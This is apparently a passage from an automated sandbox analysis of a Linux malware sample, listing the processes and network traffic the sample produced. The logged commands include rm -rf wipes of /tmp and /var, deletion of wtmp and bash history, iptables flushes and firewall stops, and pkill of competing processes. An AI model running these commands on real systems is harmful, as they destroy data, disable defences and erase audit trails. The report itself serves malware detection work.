    Source: /bin/fusermount (PID: 5462)File: /proc/5462/mountsJump to behavior
    Source: /bin/sh (PID: 5278)Pkill executable: /usr/bin/pkill -> pkill -9 busybox
    Source: /bin/sh (PID: 5284)Pkill executable: /usr/bin/pkill -> pkill -9 perl
    Source: /bin/sh (PID: 5286)Pkill executable: /usr/bin/pkill -> pkill -9 python
    Source: /usr/share/gdm/generate-config (PID: 5456)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
    Source: /usr/share/gdm/generate-config (PID: 5571)Pkill executable: /usr/bin/pkill -> pkill --signal HUP --uid gdm dconf-service
    Source: /bin/sh (PID: 5437)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5439)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5441)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5443)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5445)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5447)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5452)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5454)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5555)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5557)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nvidia[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5559)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5561)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*radeon[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5563)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5565)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*amdgpu[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /bin/sh (PID: 5567)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /etc/modprobe.d/alsa-base.conf /etc/modprobe.d/amd64-microcode-blacklist.conf /etc/modprobe.d/blacklist-ath_pci.conf /etc/modprobe.d/blacklist-firewire.conf /etc/modprobe.d/blacklist-framebuffer.conf /etc/modprobe.d/blacklist-modem.conf /etc/modprobe.d/blacklist-oss.conf /etc/modprobe.d/blacklist-rare-network.conf /etc/modprobe.d/blacklist.conf /etc/modprobe.d/intel-microcode-blacklist.conf /etc/modprobe.d/iwlwifi.conf /etc/modprobe.d/mdadm.conf
    Source: /bin/sh (PID: 5569)Grep executable: /usr/bin/grep -> grep -G ^blacklist.*nouveau[[:space:]]*$ /lib/modprobe.d/aliases.conf /lib/modprobe.d/blacklist_linux_5.4.0-72-generic.conf /lib/modprobe.d/blacklist_linux_5.4.0-81-generic.conf /lib/modprobe.d/fbdev-blacklist.conf /lib/modprobe.d/systemd.conf
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5146/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5146/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1582/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1582/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/3088/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/3088/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/230/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/230/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/110/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/110/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/231/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/231/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/111/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/111/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/232/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/232/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1579/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1579/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/112/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/112/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/233/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/233/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1699/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1699/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/113/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/113/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/234/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/234/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1335/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1335/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1698/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1698/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/114/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/114/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/235/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/235/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1334/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1334/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1576/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1576/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2302/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2302/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/115/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/115/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/236/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/236/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/116/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/116/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/237/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/237/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/117/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/117/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/118/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/118/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/910/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/910/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/119/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/119/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/912/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/912/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/10/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/10/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2307/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2307/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/11/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/11/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/918/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/918/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/12/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/12/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/13/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/13/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5274/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5274/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/14/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/14/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5154/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5154/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/15/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/15/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/16/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/16/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5156/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/5156/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/17/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/17/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/18/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/18/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1594/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1594/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/120/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/120/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/121/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/121/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1349/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1349/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/1/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/122/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/122/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/243/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/243/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/123/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/123/cmdline
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2/status
    Source: /usr/bin/pkill (PID: 5284)File opened: /proc/2/cmdline
    Source: /usr/bin/whoopsie (PID: 5337)Directory: /nonexistent/.cacheJump to behavior
    Source: /bin/sh (PID: 5301)Iptables executable: /sbin/iptables -> /sbin/iptables -F
    Source: /bin/sh (PID: 5302)Iptables executable: /sbin/iptables -> /sbin/iptables -X
    Source: /usr/bin/whoopsie (PID: 5337)File: /var/crash (bits: gv usr: rwx grp: rwx all: rwx)Jump to behavior
    Source: /usr/sbin/gdm3 (PID: 5502)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
    Source: /usr/sbin/gdm3 (PID: 5502)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
    Source: /usr/sbin/gdm3 (PID: 5582)File: /var/run/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
    Source: /usr/sbin/gdm3 (PID: 5582)File: /var/log/gdm3 (bits: - usr: -x grp: x all: rwx)Jump to behavior
    Source: /tmp/x86 (PID: 5256)Shell command executed: sh -c "rm -rf /tmp/* /var/* /var/run/* /var/tmp/*"
    Source: /tmp/x86 (PID: 5265)Shell command executed: sh -c "rm -rf /var/log/wtmp"
    Source: /tmp/x86 (PID: 5267)Shell command executed: sh -c "rm -rf /tmp/*"
    Source: /tmp/x86 (PID: 5269)Shell command executed: sh -c "rm -rf /bin/netstat"
    Source: /tmp/x86 (PID: 5271)Shell command executed: sh -c "iptables -F"
    Source: /tmp/x86 (PID: 5276)Shell command executed: sh -c "pkill -9 busybox"
    Source: /tmp/x86 (PID: 5283)Shell command executed: sh -c "pkill -9 perl"
    Source: /tmp/x86 (PID: 5285)Shell command executed: sh -c "pkill -9 python"
    Source: /tmp/x86 (PID: 5289)Shell command executed: sh -c "service iptables stop"
    Source: /tmp/x86 (PID: 5300)Shell command executed: sh -c "/sbin/iptables -F; /sbin/iptables -X"
    Source: /tmp/x86 (PID: 5303)Shell command executed: sh -c "service firewalld stop"
    Source: /tmp/x86 (PID: 5311)Shell command executed: sh -c "rm -rf ~/.bash_history"
    Source: /tmp/x86 (PID: 5313)Shell command executed: sh -c "history -c"
    Source: /usr/bin/gpu-manager (PID: 5436)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5438)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5440)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5442)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5444)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5446)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5451)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5453)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5554)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5556)Shell command executed: sh -c "grep -G \"^blacklist.*nvidia[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5558)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5560)Shell command executed: sh -c "grep -G \"^blacklist.*radeon[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5562)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5564)Shell command executed: sh -c "grep -G \"^blacklist.*amdgpu[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5566)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /etc/modprobe.d/*.conf"
    Source: /usr/bin/gpu-manager (PID: 5568)Shell command executed: sh -c "grep -G \"^blacklist.*nouveau[[:space:]]*$\" /lib/modprobe.d/*.conf"
    Source: /bin/sh (PID: 5257)Rm executable: /usr/bin/rm -> rm -rf /tmp/config-err-dHT8bZ /tmp/dmesgtail.log /tmp/snap.lxd /tmp/ssh-hOQ5FjG2iVgO /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-c4RYFi /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-gKIF8e /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-gB0a9f /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-APWnLg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-IofUpj /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-AfPZzg /tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-x0xO0i /tmp/vmware-root_721-4290559889 /tmp/x86 /var/backups /var/cache /var/crash /var/lib /var/local /var/lock /var/log /var/mail /var/metrics /var/opt /var/run /var/snap /var/spool /var/tmp /var/run/NetworkManager /var/run/acpid.pid /var/run/acpid.socket /var/run/apport.lock /var/run/avahi-daemon /var/run/blkid /var/run/cloud-init /var/run/console-setup /var/run/crond.pid /var/run/crond.reboot /var/run/cryptsetup /var/run/cups /var/run/dbus /var/run/dmeventd-client /var/run/dmeventd-server /var/run/gdm3 /var/run/gdm3.pid /var/run/initctl /var/run/initramfs /var/run/irqbalance /var/run/lock /var/run/log /var/run/lvm /var/run/mlocate.daily.lock /var/run/mono-xsp4 /var/run/mono-xsp4.pid /var/run/motd.d /var/run/mount /var/run/multipathd.pid /var/run/netns /var/run/network /var/run/screen /var/run/sendsigs.omit.d /var/run/shm /var/run/snapd /var/run/snapd-snap.socket /var/run/snapd.socket /var/run/speech-dispatcher /var/run/spice-vdagentd /var/run/sshd /var/run/sshd.pid /var/run/sudo /var/run/systemd /var/run/tmpfiles.d /var/run/udev /var/run/udisks2 /var/run/unattended-upgrades.lock /var/run/user /var/run/utmp /var/run/uuidd /var/run/vmware /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-ModemManager.service-J6Q1Te /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-colord.service-srP90f /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-fwupd.service-biJ0Gi /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-switcheroo-control.service-1jIxdj /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-logind.service-llmWag /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-systemd-resolved.service-X16eHh /var/tmp/systemd-private-ec795e01d534441298b2bf519e4c51fc-upower.service-GpSnaf
    Source: /bin/sh (PID: 5266)Rm executable: /usr/bin/rm -> rm -rf /var/log/wtmp
    Source: /bin/sh (PID: 5268)Rm executable: /usr/bin/rm -> rm -rf /tmp/*
    Source: /bin/sh (PID: 5270)Rm executable: /usr/bin/rm -> rm -rf /bin/netstat
    Source: /bin/sh (PID: 5312)Rm executable: /usr/bin/rm -> rm -rf /root/.bash_history
    Source: /usr/bin/gpu-manager (PID: 5553)Log file created: /var/log/gpu-manager.logJump to dropped file
    Source: /usr/sbin/service (PID: 5297)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p
    Source: /usr/sbin/service (PID: 5310)Sed executable: /usr/bin/sed -> sed -ne s/\\.socket\\s*[a-z]*\\s*$/.socket/p

    Hooking and other Techniques for Hiding and Protection:

    barindex
    Sample deletes itselfShow sources
    Source: /usr/bin/rm (PID: 5257)File: /tmp/x86Jump to behavior
    Uses known network protocols on non-standard portsShow sources
    Source: unknownNetwork traffic detected: HTTP traffic on port 55398 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 57708 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50586 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60950 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 23 -> 17012
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 57248 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 58332 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 47428 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 37264 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 38424 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 50732 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 32874 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60672 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 34352 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 54748 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 35894 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40048 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 45364 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 59078 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 33754 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 36250 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 46296 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 40198 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 53918 -> 37215
    Source: unknownNetwork traffic detected: HTTP traffic on port 60080 -> 52869
    Source: unknownNetwork traffic detected: HTTP traffic on port 60238 -> 52869
